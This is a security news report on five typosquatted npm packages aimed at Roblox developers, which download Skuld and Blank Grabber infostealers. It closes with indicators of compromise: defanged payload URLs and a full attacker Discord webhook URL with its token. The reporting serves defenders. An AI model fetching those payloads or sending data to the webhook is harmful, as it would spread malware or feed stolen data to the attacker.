Researchers discovered five malicious npm packages that target Roblox developers, spreading malware to steal credentials and personal information.
These packages, which include autoadv, ro.dll, node-dlls, and two rolimons-api versions, were designed to imitate legitimate modules that are often utilized by the Roblox developer community.
As of the second quarter of 2024, Roblox, an online platform and game production system, had 79.5 million daily active users, 58% of whom were 13 years of age or older, and a 2.6 million contributor developer community.
The platform’s popularity makes it an appealing target for cybercriminals looking to steal sensitive information or obtain unauthorized access to user accounts.
The Attack Mechanism
By releasing a fake variation called node-dlls, the threat actor typosquatted the well-known node-dll package, which has been downloaded more than 35,800 times.
Likewise, the packages [email protected] and [email protected] were designed to mimic Rolimon’s API Module, a tool that Roblox developers use to incorporate Rolimon’s data into their games or applications.
Although there are unauthorized wrappers and modules, including the Rolimons Lua module on GitHub and the Rolimons Python package, which has been downloaded over 17,000 times, the malicious rolimons-api packages aimed to take advantage of developers’ trust in well-known names.
“The malicious packages contained obfuscated code that downloaded and executed Skuld infostealer and Blank Grabber malware”, Socket’s threat research team shared with Cyber Security News.
Managed Detection and Response Buyer’s Guide – Free Download (PDF)
The Go-written Skuld infostealer is intended to retrieve sensitive data from Windows systems, specifically from programs such as Discord, browsers based on Chromium and Firefox, and cryptocurrency wallets.
Blank Grabber is a Python-based malware that takes sensitive data from affected Windows computers.
With its easy-to-use GUI designer, threat actors can alter the malware’s behavior to bypass User Account Control (UAC) or disable Windows Defender.
The threat actor then receives the stolen data over Telegram or Discord webhooks.
The malicious npm packages included Obfuscated JavaScript code intended to download and run malicious executables from outside sources.
To download the malicious executables and use PowerShell instructions to run them, the function downloadAndRun was added.
The threat actor was able to run arbitrary code on the victim’s computer without immediately raising suspicion due to this procedure.
The threat actor essentially created a backdoor into the victim’s PC by running the downloaded malware.
By enabling the deployment of the Skuld infostealer and Blank Grabber malware, this move started the theft of private information, including bank data, credentials, and personal files.
A similar exploit utilizing a malicious package that mimicked the official noblox.js and noblox.js-server packages was disclosed by Socket in early 2024.
“The recurring nature of these attacks indicates a persistent threat landscape, with attackers continually seeking to exploit the popularity of the Roblox platform and its developer community’s reliance on open source code,” researchers said.
Being vigilant is essential; constantly double-check package names, examine third-party code, and use security tools made to identify potentially harmful packages.
Indicators Of Compromise (IOCs)
Malicious Packages:
Malicious URLs:
- hxxps://github[.]com/zvydev/code/raw/main/RobloxPlayerLauncher.exe
- hxxps://github[.]com/zvydev/code/raw/main/cmd.exe
- hxxps://github[.]com/zvydev/code
Discord Webhook:
hxxps://discord[.]com/api/webhooks/1298438839865577564/LcdRm0rKPE01ApFPl9RQHGqhcuExeiqKGpghrB8Lv3iKniiyEa0mVBhFySte_oBx7wyQ
Run private, Real-time Malware Analysis in both Windows & Linux VMs. Get a 14-day free trial with ANY.RUN!